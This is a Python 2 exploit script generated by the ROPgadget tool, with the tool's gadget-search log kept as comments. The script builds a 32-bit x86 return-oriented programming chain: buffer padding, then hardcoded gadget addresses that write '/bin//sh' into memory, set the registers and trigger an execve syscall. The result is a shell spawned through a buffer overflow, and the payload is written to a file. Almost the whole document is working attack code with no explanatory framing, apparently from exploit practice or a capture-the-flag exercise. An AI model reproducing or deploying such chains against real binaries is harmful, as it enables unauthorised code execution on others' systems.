# ROP chain generation
# ===========================================================

# - Step 1 -- Write-what-where gadgets

# [+] Gadget found: 0x8056cf5 mov dword ptr [edx], eax ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# [+] Gadget found: 0x80a89e6 pop eax ; ret
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret

# - Step 2 -- Init syscall number gadgets

# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# [+] Gadget found: 0x807b6da inc eax ; ret

# - Step 3 -- Init syscall arguments gadgets

# [+] Gadget found: 0x80481c9 pop ebx ; ret
# [+] Gadget found: 0x806e262 pop ecx ; pop ebx ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret

# - Step 4 -- Syscall gadget

# [+] Gadget found: 0x80495f3 int 0x80

# - Step 5 -- Build the ROP chain

#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

import sys

out_file = sys.argv[1]

p = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x080a89e6) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9064) # @ .data + 4
p += pack('<I', 0x080a89e6) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080562b0) # xor eax, eax ; ret
p += pack('<I', 0x08056cf5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x0806e262) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080d9060) # padding without overwrite ebx

p += pack('<I', 0x0806e23b) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080562b0) # xor eax, eax ; ret

p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x0807b6da) # inc eax ; ret
p += pack('<I', 0x080495f3) # int 0x80


with open(out_file, "wb") as f:
    f.write(p)